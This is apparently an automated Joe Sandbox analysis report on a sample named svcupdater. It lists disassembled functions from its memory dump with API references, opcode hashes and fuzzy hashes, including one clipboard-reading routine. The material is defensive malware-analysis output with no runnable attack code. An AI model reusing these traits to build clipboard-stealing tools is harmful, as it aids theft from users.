                                                                                                    Function 00BF8B0A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00BF8C29
                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00BF8D37
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00BF8E89
                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00BF8EA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 2751267872-393685449
                                                                                                    • Opcode ID: 9665d4e740242b79c7daa82eb55fd037475ee2ab240ea6c0a4c837e9b8bbd32a
                                                                                                    • Instruction ID: 2de52543908824d741efa72b9ee96754a11191d6a3aa56b021f2b4881bebab0a
                                                                                                    • Opcode Fuzzy Hash: 9665d4e740242b79c7daa82eb55fd037475ee2ab240ea6c0a4c837e9b8bbd32a
                                                                                                    • Instruction Fuzzy Hash: AFB1597680020DEFCF19EF94C8819BEBBF5FF14310B1445AAEA146B252DB31DA59CB91
                                                                                                    Function 00C06C6D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3907804496
                                                                                                    • Opcode ID: c2b87182cdc72c83432c1eb9a2bdcd23cc82e9fb320f693136b682c56e3d0c1b
                                                                                                    • Instruction ID: 37687154bfa88050aaf481e358c2978cf0a87404d53066f76e74c710b012da3c
                                                                                                    • Opcode Fuzzy Hash: c2b87182cdc72c83432c1eb9a2bdcd23cc82e9fb320f693136b682c56e3d0c1b
                                                                                                    • Instruction Fuzzy Hash: D6B1F374E0428AAFDB15DF99D880BBD7BB1BF45314F148158E5209B2D1C7709E56CFA0
                                                                                                    Function 00BED980 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED9FD
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BEDA50
                                                                                                    • __Getcoll.LIBCPMT ref: 00BEDA62
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BEDA81
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BEDB16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetcollLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1629477862-1405518554
                                                                                                    • Opcode ID: 835270553a822eb4c9480709b0fa969f20f2274bff7299ae748a3d841343a699
                                                                                                    • Instruction ID: 4623c30c7cdfac5ca313501e133fcb900ba50a70c14ca4a7d214259e0a6d4e5e
                                                                                                    • Opcode Fuzzy Hash: 835270553a822eb4c9480709b0fa969f20f2274bff7299ae748a3d841343a699
                                                                                                    • Instruction Fuzzy Hash: 6B61C4B1D002489BEF10DFA9D9857DEBBF4EF04310F1445A9E915E7382E7B49A48CB91
                                                                                                    Function 00BE35E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE3663
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE36AF
                                                                                                    • __Getctype.LIBCPMT ref: 00BE36C8
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE36E4
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE3779
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1840309910-1405518554
                                                                                                    • Opcode ID: 37564be05ffebdafdce5fd8c443677a09189bd42d41cdca25d5b4e49afff4a2c
                                                                                                    • Instruction ID: cac55efa41e184624fa6196ae2d0e3430d8ddfddc1b29e855e949f645e7d4dd2
                                                                                                    • Opcode Fuzzy Hash: 37564be05ffebdafdce5fd8c443677a09189bd42d41cdca25d5b4e49afff4a2c
                                                                                                    • Instruction Fuzzy Hash: C451A1F1D0028CABEF10DFA5D945B9EBBF8EF14700F144169E905A7242E775AA48C791
                                                                                                    Function 00BE2C80 Relevance: 10.6, APIs: 7, Instructions: 149clipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00BE2CB4
                                                                                                    • GetClipboardData.USER32(00000001), ref: 00BE2CC0
                                                                                                    • CloseClipboard.USER32 ref: 00BE2CCC
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BE2CFA
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BE2D3F
                                                                                                    • CloseClipboard.USER32 ref: 00BE2D49
                                                                                                    • CloseClipboard.USER32 ref: 00BE2DAB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Close$Global$DataLockOpenUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3729548305-0
                                                                                                    • Opcode ID: 2bc3f29b52e439b50d9ac548bd7e6b173236a76083e33b9b55a2be6ce439658c
                                                                                                    • Instruction ID: 902fa2c8762e7f75110d17796a47c5ffecda16be57854be430ce225b06b70098
                                                                                                    • Opcode Fuzzy Hash: 2bc3f29b52e439b50d9ac548bd7e6b173236a76083e33b9b55a2be6ce439658c
                                                                                                    • Instruction Fuzzy Hash: 6A412670A006849BD7199F75CC497AEB7F9FF89710F20835DF446A6681DBB095C0CB90
                                                                                                    Function 00BED000 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::locale::_Init.LIBCPMT ref: 00BED045
                                                                                                      • Part of subcall function 00BF4400: __EH_prolog3.LIBCMT ref: 00BF4407
                                                                                                      • Part of subcall function 00BF4400: std::_Lockit::_Lockit.LIBCPMT ref: 00BF4412
                                                                                                      • Part of subcall function 00BF4400: std::locale::_Setgloballocale.LIBCPMT ref: 00BF442D
                                                                                                      • Part of subcall function 00BF4400: _Yarn.LIBCPMT ref: 00BF4443
                                                                                                      • Part of subcall function 00BF4400: std::_Lockit::~_Lockit.LIBCPMT ref: 00BF4483
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED05C
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED07E
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED09E
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED0CC
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BED143
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BED15D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Concurrency::cancel_current_taskFacet_H_prolog3InitRegisterSetgloballocaleYarn
                                                                                                    • String ID:
                                                                                                    • API String ID: 298508500-0
                                                                                                    • Opcode ID: b065ee8ed111af11476383252827ecc26b56bc9a29b69787d27689ecfc1e5fe3
                                                                                                    • Instruction ID: c52de53baadfe9aa0137ef8bd7eba385ea64b26cfdbd49612d5686d450513c8d
                                                                                                    • Opcode Fuzzy Hash: b065ee8ed111af11476383252827ecc26b56bc9a29b69787d27689ecfc1e5fe3
                                                                                                    • Instruction Fuzzy Hash: 38417DB5D00258DFCF11DF98D981BAEBBF4EB08720F1441A9E819A7342DB75AD05CBA1
                                                                                                    Function 00BF6660 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BF6697
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00BF669F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BF6728
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00BF6753
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BF67A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 81a9eb9f88fbf919c1af01099fe0b52726e35cf1c0ac0782add859f1ae45f64c
                                                                                                    • Instruction ID: dd64815e689cf2e1447d44e2220302328e09d9f14c2776e0f2ef3bce8d722ee9
                                                                                                    • Opcode Fuzzy Hash: 81a9eb9f88fbf919c1af01099fe0b52726e35cf1c0ac0782add859f1ae45f64c
                                                                                                    • Instruction Fuzzy Hash: 7F415134A0021CABCF10EF68C885AAEBBE5EF45318F148195ED149B392D775AD59CB90
                                                                                                    Function 00C04E84 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00C04F91,00BE2EE7,?,?,00000000,?,?,00C051BB,00000021,FlsSetValue,00C19450,00C19458,?), ref: 00C04F45
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3664257935-537541572
                                                                                                    • Opcode ID: 7c7abd364041cfcc3277b5225a4144685041c868f2630439d797ce27a2031b48
                                                                                                    • Instruction ID: f32497a47ad92bded03996b06465fb9a1e83b45c1a87b6d967cccb3bf9230f54
                                                                                                    • Opcode Fuzzy Hash: 7c7abd364041cfcc3277b5225a4144685041c868f2630439d797ce27a2031b48
                                                                                                    • Instruction Fuzzy Hash: B7212BB1A41112FBC72597A0DC41B9F7768AF427A0F254150FF25A72D0DB30EE01C6E0
                                                                                                    Function 00C12436 Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __freea$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 541289543-0
                                                                                                    • Opcode ID: 0550d7dfb429cb2e88c24f926629f17c51335fcbdc46ca10900c130fddc11288
                                                                                                    • Instruction ID: 2b9f51ef89d1d54253611f8203cbd1e4045851f09e5b36ed83bf202e6572fc2f
                                                                                                    • Opcode Fuzzy Hash: 0550d7dfb429cb2e88c24f926629f17c51335fcbdc46ca10900c130fddc11288
                                                                                                    • Instruction Fuzzy Hash: 6571E57AA002099BDF209FA48C91BFF77BA9F4A310F150055F924B72C1D6359EA5E760
                                                                                                    Function 00BF4F07 Relevance: 9.2, APIs: 6, Instructions: 224COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 00BF4F92
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00BF5020
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BF5092
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00BF50AC
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BF510F
                                                                                                    • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00BF512C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2984826149-0
                                                                                                    • Opcode ID: 31bb81e2b28873ee2dc85013aa702f7077dbc052b9230df5489da15466ead677
                                                                                                    • Instruction ID: 2330ffb99f8b77c3abaf0f0d2f199cf5977bb178b6636ddbabaff6ca96535596
                                                                                                    • Opcode Fuzzy Hash: 31bb81e2b28873ee2dc85013aa702f7077dbc052b9230df5489da15466ead677
                                                                                                    • Instruction Fuzzy Hash: 41716B7190064E9ADB318FA4DC81ABF7BFAEF45310F150095EB09A7251DB359948CBA0
                                                                                                    Function 00BF4D1D Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00BF4D66
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00BF4DD1
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF4DEE
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00BF4E2D
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF4E8C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BF4EAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829165498-0
                                                                                                    • Opcode ID: 8bad6a0d52cb180a6988f7cea9b61253f6655a59dd1543c364fb7605875cf6b8
                                                                                                    • Instruction ID: ac46d8bab403fc45f8a7cf52158e7d3a2bcfa478453e7fe2b03dd2407d6a83fa
                                                                                                    • Opcode Fuzzy Hash: 8bad6a0d52cb180a6988f7cea9b61253f6655a59dd1543c364fb7605875cf6b8
                                                                                                    • Instruction Fuzzy Hash: B0519A72A0021EABEB248FA4CC80FBB7BE9FF44750F1145A8FB159B160D7718D58CA90
                                                                                                    Function 00BE8760 Relevance: 9.2, APIs: 6, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8796
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE87B9
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE87D9
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE884B
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8863
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE8886
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
                                                                                                    • Opcode ID: 95ebed323a42a7813988481b5d94d4f4f1480b3325674d1d13e348226f411cb3
                                                                                                    • Instruction ID: ed918290ea311b97317428f4e98e0961e21ac2d2873cf3918a3c3b73fddce4b6
                                                                                                    • Opcode Fuzzy Hash: 95ebed323a42a7813988481b5d94d4f4f1480b3325674d1d13e348226f411cb3
                                                                                                    • Instruction Fuzzy Hash: A451A071A00649DFCB24DF59D841BAEBBF4FF48720F1442A9E819A7791DB30AE05CB91
                                                                                                    Function 00BED1C0 Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED1FB
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED220
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED240
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED271
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BED2E6
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BED300
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
                                                                                                    • Opcode ID: d9ce587f08daab9e841f91a8ee8e263c2c48c43a6652303291de57a6a11c50e2
                                                                                                    • Instruction ID: 4267f383e5b018c220cfd2a961504be705ff3ab19ab4a0378327e9c1842f3f32
                                                                                                    • Opcode Fuzzy Hash: d9ce587f08daab9e841f91a8ee8e263c2c48c43a6652303291de57a6a11c50e2
                                                                                                    • Instruction Fuzzy Hash: 73418B75D00258CFCF25DF98D980BAEBBF0FB48720F1441A9E915A7251DB70AD05CBA1
                                                                                                    Function 00BE8DD0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8E06
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8E29
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8E49
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE8EBB
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8ED3
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE8EF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
                                                                                                    • Opcode ID: f23f350fc96604968df1e5d9a1bd3e60eafc3e603e38279dce176366cdc640c4
                                                                                                    • Instruction ID: 693c88e5d978a7690bd4275cd4add6ae7973466108737efe7c31fa5028cf281a
                                                                                                    • Opcode Fuzzy Hash: f23f350fc96604968df1e5d9a1bd3e60eafc3e603e38279dce176366cdc640c4
                                                                                                    • Instruction Fuzzy Hash: D4417A71910699CFCF21DF94D941BAFB7F4FB04720F1406A9E90967691DB30AE09CBA0
                                                                                                    Function 00BF879C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00BF8793,00BF65FF,00BF5D1C), ref: 00BF87AA
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF87B8
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF87D1
                                                                                                    • SetLastError.KERNEL32(00000000,00BF8793,00BF65FF,00BF5D1C), ref: 00BF8823
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
